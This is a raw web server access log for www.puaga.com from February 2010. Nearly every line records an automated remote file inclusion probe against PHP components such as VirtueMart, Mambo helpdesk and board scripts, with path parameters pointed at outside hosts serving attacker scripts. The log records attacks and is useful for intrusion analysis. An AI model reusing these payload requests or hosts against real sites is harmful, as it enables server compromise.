74.50.85.229 - - [12/Feb/2010:05:15:16 -0800] "GET /logs///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:05:15:52 -0800] "GET /logs/access_100115.log//?path%5Bdocroot%5D=http://www.ladies-in-nylon.com///fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:05:15:53 -0800] "GET /logs/access_100125.log%20%20///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [12/Feb/2010:05:16:43 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [12/Feb/2010:05:16:43 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [12/Feb/2010:05:16:44 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [12/Feb/2010:05:16:49 -0800] "GET /module/?M=A HTTP/1.0" 200 1362 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
115.93.146.76 - - [12/Feb/2010:05:16:51 -0800] "GET /logs/access_100129.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:05:16:51 -0800] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:05:16:51 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:05:16:55 -0800] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:05:16:55 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:05:16:55 -0800] "GET /logs/access_100129.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:05:16:56 -0800] "GET /logs/access_100129.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:05:16:56 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [12/Feb/2010:05:16:56 -0800] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [12/Feb/2010:05:17:08 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://3040club.com/data/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [12/Feb/2010:05:17:09 -0800] "GET /logs/access_100115.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://3040club.com/data/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [12/Feb/2010:05:17:09 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://3040club.com/data/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [12/Feb/2010:05:17:33 -0800] "GET /logs/access_100123.log%20%20//include/admin.lib.inc.php?site_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [12/Feb/2010:05:17:34 -0800] "GET /logs/access_100123.log%20%20//include/admin.lib.inc.php?site_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [12/Feb/2010:05:18:22 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://3040club.com/data/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [12/Feb/2010:05:18:22 -0800] "GET /logs/access_100119.log//include/admin.lib.inc.php?site_path=http://3040club.com/data/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [12/Feb/2010:05:18:22 -0800] "GET /include/admin.lib.inc.php?site_path=http://3040club.com/data/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [12/Feb/2010:05:18:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [12/Feb/2010:05:18:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [12/Feb/2010:05:18:34 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:18:44 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:18:44 -0800] "GET /logs/access_100129.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:18:44 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:18:56 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:18:56 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:18:56 -0800] "GET /logs/access_100114.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.50 - - [12/Feb/2010:05:19:01 -0800] "GET /logs/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.50 - - [12/Feb/2010:05:19:02 -0800] "GET /logs/access_100121.log%20%20/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.50 - - [12/Feb/2010:05:19:03 -0800] "GET /index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.50 - - [12/Feb/2010:05:19:04 -0800] "GET /logs/access_100109.log%20%20/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:19:08 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:19:08 -0800] "GET /logs/access_100114.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:19:08 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:19:09 -0800] "GET /logs/access_100103.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:19:27 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:19:27 -0800] "GET /logs/access_100129.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:19:27 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [12/Feb/2010:05:19:42 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [12/Feb/2010:05:19:42 -0800] "GET /logs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [12/Feb/2010:05:19:42 -0800] "GET /delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:19:47 -0800] "GET /logs/access_100103.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [12/Feb/2010:05:19:51 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [12/Feb/2010:05:19:55 -0800] "GET /logs/access_100129.log%20%20//bbs/write_update.php?board_skin_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [12/Feb/2010:05:19:55 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [12/Feb/2010:05:19:55 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [12/Feb/2010:05:20:19 -0800] "GET /logs/access_100202.log%20%20//bbs/write_update.php?board_skin_path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [12/Feb/2010:05:20:55 -0800] "GET /delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [12/Feb/2010:05:20:55 -0800] "GET /logs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [12/Feb/2010:05:20:55 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [12/Feb/2010:05:20:56 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:05:21:08 -0800] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:05:21:08 -0800] "GET /logs///modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
62.140.23.24 - - [12/Feb/2010:05:21:20 -0800] "GET /administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [12/Feb/2010:05:21:20 -0800] "GET /logs/access_100124.log%20%20//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [12/Feb/2010:05:21:21 -0800] "GET /logs//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:21:23 -0800] "GET /logs/access_100130.log///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:21:26 -0800] "GET /logs/access_100125.log///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [12/Feb/2010:05:21:33 -0800] "GET /logs/access_100112.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [12/Feb/2010:05:21:33 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [12/Feb/2010:05:21:34 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [12/Feb/2010:05:21:38 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [12/Feb/2010:05:21:40 -0800] "GET /logs/access_100103.log//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [12/Feb/2010:05:21:55 -0800] "GET /myevent.php?myevent_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [12/Feb/2010:05:21:55 -0800] "GET /logs/access_100129.log%20%20/myevent.php?myevent_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [12/Feb/2010:05:21:55 -0800] "GET /logs/myevent.php?myevent_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:22:04 -0800] "GET /logs/access_100119.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:22:25 -0800] "GET /logs/access_100130.log///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:22:29 -0800] "GET /logs/access_100125.log///delete_comment.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [12/Feb/2010:05:22:29 -0800] "GET /logs/access_100112.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [12/Feb/2010:05:22:29 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [12/Feb/2010:05:22:29 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [12/Feb/2010:05:22:49 -0800] "GET /logs/access_100115.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [12/Feb/2010:05:22:51 -0800] "GET /logs/access_100109.log%20%20/myevent.php?myevent_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [12/Feb/2010:05:22:54 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://3040club.com/data/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [12/Feb/2010:05:22:54 -0800] "GET /logs/access_100115.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://3040club.com/data/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [12/Feb/2010:05:22:55 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://3040club.com/data/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [12/Feb/2010:05:23:01 -0800] "GET /delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [12/Feb/2010:05:23:02 -0800] "GET /logs//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [12/Feb/2010:05:23:02 -0800] "GET /logs/access_100203.log%20%20//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [12/Feb/2010:05:23:02 -0800] "GET /logs/access_100122.log%20%20//delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:23:05 -0800] "GET /logs/access_100119.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:05:23:06 -0800] "GET /include/write.php?dir=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:05:23:06 -0800] "GET /logs//include/write.php?dir=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:05:23:06 -0800] "GET /logs/access_100126.log//include/write.php?dir=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.217.216.132 - - [12/Feb/2010:05:23:22 -0800] "GET /logs/access_100111.log//include/write.php?dir=http://astru1.fileave.com/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [12/Feb/2010:05:23:32 -0800] "GET /logs//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [12/Feb/2010:05:23:32 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [12/Feb/2010:05:23:32 -0800] "GET /administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [12/Feb/2010:05:23:39 -0800] "GET /administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [12/Feb/2010:05:23:39 -0800] "GET /logs//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [12/Feb/2010:05:23:39 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [12/Feb/2010:05:23:44 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [12/Feb/2010:05:24:27 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:05:24:29 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:05:24:29 -0800] "GET /logs/access_100129.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:05:24:29 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:05:24:47 -0800] "GET /logs/access_100204.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:05:24:47 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:05:24:47 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:05:25:16 -0800] "GET /logs/access_100103.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.53.138.137 - - [12/Feb/2010:05:25:22 -0800] "GET /logs/access_100128.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:05:25:42 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:05:25:42 -0800] "GET /skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:25:42 -0800] "GET /administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:25:42 -0800] "GET /logs//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:05:25:42 -0800] "GET /logs/access_100128.log%20%20//administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [12/Feb/2010:05:25:46 -0800] "GET /logs/access_100120.log%20%20//skin/zero_vote/error.php?dir=http://zerozon.co.kr/photos/count/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
